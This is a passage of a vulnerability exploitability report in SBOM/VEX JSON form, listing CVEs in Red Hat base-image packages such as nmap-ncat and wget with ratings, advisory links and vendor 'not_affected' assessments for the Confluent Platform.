          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libnghttp2@1.33.0-6.el8_10.2?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libnghttp2@1.33.0-6.el8_10.2?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libnghttp2@1.33.0-6.el8_10.2?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libnghttp2@1.33.0-6.el8_10.2?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libnghttp2@1.33.0-6.el8_10.2?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libnghttp2@1.33.0-6.el8_10.2?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libnghttp2@1.33.0-6.el8_10.2?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libnghttp2@1.33.0-6.el8_10.2?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libnghttp2@1.33.0-6.el8_10.2?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libnghttp2@1.33.0-6.el8_10.2?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": "Exploitability analysis, additional details:\nTemurin JVM binary is linked only against glibc:\n$ ldd /usr/lib/jvm/temurin-17-jre/bin/java\n        linux-vdso.so.1 (0x0000ffff8cd00000)\n        libjli.so => /usr/lib/jvm/temurin-17-jre/bin/../lib/libjli.so (0x0000ffff8cc70000)\n        libpthread.so.0 => /lib64/libpthread.so.0 (0x0000ffff8cc3b000)\n        libdl.so.2 => /lib64/libdl.so.2 (0x0000ffff8cc1a000)\n        libc.so.6 => /lib64/libc.so.6 (0x0000ffff8caa4000)\n        /lib/ld-linux-aarch64.so.1 (0x0000ffff8ccc2000)"
      }
    },
    {
      "id": "CVE-2026-58058",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        191
      ],
      "description": "Nmap through 7.99 does not keep the IPv6 extension-header walk within the captured packet in ipv6_get_data_primitive (libnetutil/netutil.cc), so the pointer advances past the buffer and the remaining-length computation underflows to a large value. A scanned target or on-path attacker returning a crafted IPv6 response with a truncated extension header can trigger out-of-bounds reads and a crash during raw IPv6 scans.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-58058"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-58058"
        },
        {
          "url": "https://github.com/bikini/exploitarium/tree/main/nmap-ipv6-extlen-wrap-poc"
        },
        {
          "url": "https://github.com/nmap/nmap/commit/bb6754e76bb1686315008e1aa1c40202a513fb83"
        },
        {
          "url": "https://nmap.org/changelog.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-58058"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-58058"
        },
        {
          "url": "https://www.vulncheck.com/advisories/nmap-integer-underflow-in-ipv6-extension-header-parsing"
        }
      ],
      "published": "2026-06-28T02:16:33+00:00",
      "updated": "2026-06-30T17:31:44+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/nmap-ncat@7.92-2.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2",
          "versions": [
            {
              "version": "2:7.92-2.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/nmap-ncat@7.92-2.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/nmap-ncat@7.92-2.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/nmap-ncat@7.92-2.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/nmap-ncat@7.92-2.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/nmap-ncat@7.92-2.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/nmap-ncat@7.92-2.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/nmap-ncat@7.92-2.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/nmap-ncat@7.92-2.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/nmap-ncat@7.92-2.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/nmap-ncat@7.92-2.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/nmap-ncat@7.92-2.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/nmap-ncat@7.92-2.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/nmap-ncat@7.92-2.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/nmap-ncat@7.92-2.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/nmap-ncat@7.92-2.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/nmap-ncat@7.92-2.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/nmap-ncat@7.92-2.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/nmap-ncat@7.92-2.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/nmap-ncat@7.92-2.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-58469",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        125
      ],
      "description": "GNU Wget through 1.25.0, fixed in commit 37a40fc, contains a heap buffer underread vulnerability in the clean_metalink_string() function within src/metalink.c that allows a malicious server to trigger memory corruption by serving a Metalink document containing a whitespace-only URL. Attackers can cause the function to decrement a pointer past the start of the buffer when processing an all-whitespace Metalink URL, potentially leading to abnormal program behavior.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-58469"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-58469"
        },
        {
          "url": "https://github.com/advisories/GHSA-fxf9-rxpj-26gx"
        },
        {
          "url": "https://gitlab.com/gnuwget/wget/-/commit/37a40fcb450153f69537c7cbc2a7a4fb0b6f7826"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-58469"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8543-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-58469"
        },
        {
          "url": "https://www.vulncheck.com/advisories/gnu-wget-heap-buffer-underread-via-metalink-url-parsing"
        }
      ],
      "published": "2026-07-07T21:17:28+00:00",
      "updated": "2026-07-09T15:59:43+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.19.5-12.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-58470",
      "ratings": [
        {
          "source": {
            "name": "julia"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        190
      ],
      "description": "GNU Wget through 1.25.0, fixed in commit 43d3ba9, contains an integer overflow vulnerability in the parse_content_range() function within src/http.c that allows server-controlled values to cause signed integer arithmetic to overflow. Attackers can supply malicious Content-Range header values to trigger undefined behavior and download desynchronization in the affected client.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-58470"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-58470"
        },
        {
          "url": "https://github.com/advisories/GHSA-5f52-px6m-c5hw"
        },
        {
          "url": "https://gitlab.com/gnuwget/wget/-/commit/43d3ba9336bc94937e6fae2365c6ffd30c34ffcf"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-58470"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8543-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-58470"
        },
        {
          "url": "https://www.vulncheck.com/advisories/gnu-wget-integer-overflow-via-content-range-header-parsing"
        }
      ],
      "published": "2026-07-07T21:17:28+00:00",
      "updated": "2026-07-09T16:01:18+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.19.5-12.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-58471",
      "ratings": [
        {
          "source": {
            "name": "julia"
          },
          "score": 7.1,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.1,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        122
      ],
      "description": "GNU Wget through 1.25.0, fixed in commit c2640fe, contains a heap buffer overflow vulnerability in the convert_fname() function within src/url.c that allows remote attackers to trigger memory corruption through a server-supplied filename requiring character set conversion. When the output buffer is too small during iconv E2BIG reallocation, the reallocation logic miscalculates the remaining space, leading to a heap buffer overflow that can be exploited via a maliciously crafted server response.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-58471"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-58471"
        },
        {
          "url": "https://github.com/advisories/GHSA-vv88-699v-w5rh"
        },
        {
          "url": "https://gitlab.com/gnuwget/wget/-/commit/c2640fe5171c59f87c58dc9fcb195b2d18b010ee"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-58471"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8543-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-58471"
        },
        {
          "url": "https://www.vulncheck.com/advisories/gnu-wget-heap-buffer-overflow-via-convert-fname-in-url-c"
        }
      ],
      "published": "2026-07-07T21:17:28+00:00",
      "updated": "2026-07-09T16:02:07+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.19.5-12.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-58472",
      "ratings": [
        {
          "source": {
            "name": "julia"
          },
          "score": 7.1,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.1,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        190
      ],
      "description": "GNU Wget through 1.25.0, fixed in commit dd692d9, contains a heap buffer overflow vulnerability in the html_quote_string() function in src/convert.c that allows a remote attacker to trigger memory corruption by supplying a crafted HTML attribute with a large number of characters requiring entity encoding. A server-supplied HTML attribute causes a signed integer counter to overflow during output size accumulation, resulting in an undersized heap allocation and subsequent heap buffer overflow during the copy phase.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-58472"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-58472"
        },
        {
          "url": "https://github.com/advisories/GHSA-332r-8pmf-8m9p"
        },
        {
          "url": "https://gitlab.com/gnuwget/wget/-/commit/dd692d9cea5335b181d877ae917fe6e75587a812"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-58472"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8543-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-58472"
        },
        {
          "url": "https://www.vulncheck.com/advisories/gnu-wget-heap-buffer-overflow-via-html-attribute-encoding"
        }
      ],
      "published": "2026-07-07T21:17:28+00:00",
      "updated": "2026-07-09T15:58:45+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.19.5-12.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
